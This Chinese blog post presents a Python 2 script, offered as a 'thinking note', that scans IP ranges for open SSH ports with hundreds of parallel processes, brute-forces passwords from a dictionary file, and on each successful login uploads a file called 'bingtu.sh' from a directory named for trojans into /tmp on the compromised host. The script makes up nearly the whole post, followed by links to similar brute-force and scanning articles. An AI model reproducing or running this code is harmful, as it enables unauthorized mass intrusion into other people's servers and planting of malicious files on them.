这个扫描是概率问题,是需要字典的,以下代码是作为参考,字典可以去网上下载,我就不提供,我提供的是思路!

#!/usr/bin/env python

# coding=utf-8

 

from IPy import IP

import socket,os,re,multiprocessing,paramiko

import threading,time

import os.path

from paramiko import SSHClient

from paramiko import AutoAddPolicy

from time import ctime

 

#---------->定义变量<---------#

#-- 密码文件

password_file=os.path.join(os.getcwd(),"passwd.txt_bak")

#-- ip文件

ip_file=os.path.join(os.getcwd(),"ip.txt")

#-- 执行文件目录

Trojans_file_dir=os.getcwd()+"/include_files"

 

remote_dir="/tmp"

username="ops"

timeout_time=1

port=22

threads_num=200

 

 

#读取ip列表然后将每行ip循环出来,最终存入alllines数组

def loop_ip_everyline():

    with open(ip_file,'r') as f:

        alllines=f.readlines()

    return alllines

 

#最终输出ip格式的ip地址,最终保存在real_ips数组

def process_ip(line):

    real_ips=[]

    ip= IP(line,make_net=True)

    ips=IP(ip)

    for real_ip in ips:

        rule="(\d+\.){3}(0|255)$"

        x=re.compile(rule)

        if x.search(str(real_ip)) is  None:

            real_ips.append(real_ip)

    return real_ips

 

# 扫描指定ip的指定端口,输出所有开放了22端口的主机,终保存在last_open_ip_list数组

last_open_ip_list=[]

def scan(ip_addr):

    s = socket.socket()

    s.settimeout(timeout_time)

    if s.connect_ex((ip_addr, port)) == 0:

        return ip_addr

    s.close()

 

def put_Trojans(ip_addr,password):

    try:

        t = paramiko.Transport((ip_addr,int(port)))

        t.connect(username="root",password=password)

        sftp=paramiko.SFTPClient.from_transport(t)

        sftp.put(Trojans_file_dir+"/bingtu.sh",remote_dir+"/bingtu.sh")

        t.close()

    except Exception,e:

        print e

        print 'upload files failed:'+ip_addr

 

def try_password (ip_addr,password):

    try:

        ssh = SSHClient()

        ssh.load_system_host_keys()

        ssh.set_missing_host_key_policy(AutoAddPolicy())

        #print  "当前处理的ip是",ip_addr,"密码是"+password,ctime()

        ssh.connect(ip_addr,port,username,password,pkey=None,timeout = 2,allow_agent=False,look_for_keys=False,banner_timeout=5)

        print "目标ip"+ip_addr+"password",ctime()

        sftpclient = ssh.open_sftp()

        sftpclient.put(Trojans_file_dir+"/bingtu.sh",remote_dir+"/bingtu.sh")

        ssh.close()

        sftpclient.close()

    except Exception, e:

        print e

        #print "%s processing %s %s" % (name, ip_addr,password),ctime(),"\n"

        #print "匹配中\n"

        pass

         

 

 

if __name__ == "__main__":

    #将ip列表中的所有地址范围以ip格式存入数组last_ip_list

    print "将ip列表中的所有地址范围以ip格式存入数组last_ip_list........."

    print "破解开始"+ctime()

    alllines=loop_ip_everyline()

    ip_addr_list=[]

    for  line in alllines:

        real_ips=process_ip(line)

        for x in real_ips:

            ip_addr_list.append(str(x))

 

     

    #循环扫描各个ip的22端口,将最终开放了22端口的ip地址以数组的形式存入last_ip_list

    pool = multiprocessing.Pool(processes=threads_num)

    result=[]

    print "扫描端口开始"+ctime()

    for ip_addr in ip_addr_list:

        #print "扫描%s端口中..................." % ip_addr

        result.append(pool.apply_async(scan, args=(ip_addr,)))

    pool.close()

    pool.join()

    last_ip_list=[]

    for x in result:

        if x.get() is not None:

            last_ip_list.append(x.get())

    print "匹配的ip是",last_ip_list

    print "匹配的ip是",last_ip_list

 

    print "端口扫描完成"+ctime()

    #循环匹配开放了22端口主机的密码

    password_list = [i.strip() for i in open(password_file,'r')]

    threads = []

 

    # 创建新线程

    #n=0

    print "破解密码,传马开始"+ctime()

    #for ip_addr in last_ip_list:

    #    for password in password_list:

    #        #n=n+1

    #        thread = threading.Thread(target=try_password,args=(ip_addr,password))

    #        thread.setDaemon(True)

    #        thread.start()

    #        threads.append(thread)

    #        #print threading.activeCount()

    paramiko.util.log_to_file('paramiko.log')

    pool_1 = multiprocessing.Pool(processes=300)

    for ip_addr in last_ip_list:

        for password in password_list:

            #n=n+1

            pool_1.apply_async(try_password, args=(ip_addr,password,))

    pool_1.close()

    pool_1.join()

    ## 等待所有线程完成

    #for t in threads:

    #    t.join()

 

    print "结束"+ctime()

  

python多线程扫描爆破网站服务器思路【笔记】的更多相关文章

  1. python多线程ssh爆破

    python多线程ssh爆破 Python 0x01.About 爆弱口令时候写的一个python小脚本,主要功能是实现使用字典多线程爆破ssh,支持ip表导入,字典数据导入. 主要使用到的是pyth ...

  2. python多线程、多进程、协程笔记

    import threading import time import multiprocessing import asyncio movie_list = ['斗破.avi', '复仇者联盟.mp ...

  3. 扫描网站服务器真实IP的小脚本

    #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_8 -*- # Date: 2015年9月11日 # Author:蔚蓝行 ...

  4. Python 爬虫笔记、多线程、xml解析、基础笔记(不定时更新)

    1  Python学习网址:http://www.runoob.com/python/python-multithreading.html

  5. python多线程与多进程--存活主机ping扫描以及爬取股票价格

    python多线程与多进程 多线程: 案例:扫描给定网络中存活的主机(通过ping来测试,有响应则说明主机存活) 普通版本: #扫描给定网络中存活的主机(通过ping来测试,有响应则说明主机存活)im ...

  6. 手写网站服务器~用Python手动实现一个简单的服务器,不借助任何框架在浏览器中输出任意内容

    写在前面的一些P话: 在公司网站开发中,我们往往借助于Flask.Django等网站开发框架去提高网站开发效率.那么在面试后端开发工程师的时候,面试官可能就会问到网站开发的底层原理是什么? 我们不止仅 ...

  7. python端口扫描用多线程+线程安全的队列+Thread类实现

    用线程安全的队列Queue实现扫描端口数据存储 用多线程扫描端口 用Thread类实现程序组织 #coding:utf-8 import sys import socket import sys im ...

  8. tcp端口扫描(python多线程)

    1 使用单线程扫描单台主机 首先实现的是对单台主机中0-1024端口的扫描,发现差不多每秒扫描一个端口,很慢. import socket def tcp_scanner(host,port): cl ...

  9. 老男孩Python全栈第2期+课件笔记【高清完整92天整套视频教程】

    点击了解更多Python课程>>> 老男孩Python全栈第2期+课件笔记[高清完整92天整套视频教程] 课程目录 ├─day01-python 全栈开发-基础篇 │ 01 pyth ...

随机推荐

  1. 【视频开发】【Live555】通过live555实现H264 RTSP直播

    前面的文章中介绍了<H264视频通过RTMP流直播>,下面将介绍一下如何将H264实时视频通过RTSP直播. 实现思路是将视频流发送给live555, 由live555来实现H264数据流 ...

  2. 【神经网络与深度学习】【计算机视觉】Fast R-CNN

    转自:https://zhuanlan.zhihu.com/p/24780395?refer=xiaoleimlnote 首先声明:本文很多内容来自两个博客: RCNN, Fast-RCNN, Fas ...

  3. QT源码分析:QTcpServer

    最近在看有关IO复用方面的内容,自己也用标准c++库实现了select模型.iocp模型.poll模型.回过头来很想了解QT的socket是基于什么模型来实现的,所以看了QT关于TcpServer实现 ...

  4. Java的集合类之 List 接口用法

    集合其实在本质上面就是数据结构,它封装了一些底层的数据结构等操作进行操作. 集合的长度是可变的,用来存放对象的引用.常见的集合类有List集合.Set集合.Map集合. 1. List接口 List是 ...

  5. Django项目常见面试问题

    1.python中的lambda是什么意思,可以举例 匿名函数 a = lambda x:x+1 print(a(1)) 2.请写出以下代码执行的结果 class Parent(object): x ...

  6. python3 最基础

    python 2乱码,源码混了,代码重复,ascii码 一个字节表示 显示中文 只有英文 python 3 utf-8 三个字节 表示中文 int 整型 str 字符串 类型 bool 布尔值 Tru ...

  7. AVR单片机教程——按键状态

    好久没更新了,今天开始继续,争取日更. 今天我们来讲按键.开发板的右下角有4个按键,按下会有明显的“咔嗒”声.如何检测按键是否被按下呢?首先要把按键或直接或间接地连接到单片机上.与之前使用的4个LED ...

  8. Linux命令xargs的使用

    ls | xargs catls | xargs -I {} cat {}  大写I,指定参数的替换符号为{} 自定义

  9. 启迪链网通证经济共同体:柏链教育&火聘online推出区块链行业人才“一门式”服务

    近日,启迪链网通证经济共同体旗下两个节点成员柏链教育与火聘online,达成节点间的合作,据悉本次合作是采用共同体的生态共建模式,柏链教育与火聘online共享企业端岗位需求的大数据,然后有针对性的开 ...

  10. CF449E Jzzhu and Squares

    题目大意:有一个$n\times m$的方格图,求其中所有的格点正方形完整包含的小方格个数,多组询问.$n,m\leqslant 10^6$ 题解:令$n\leqslant m$.有一个显然的式子:$ ...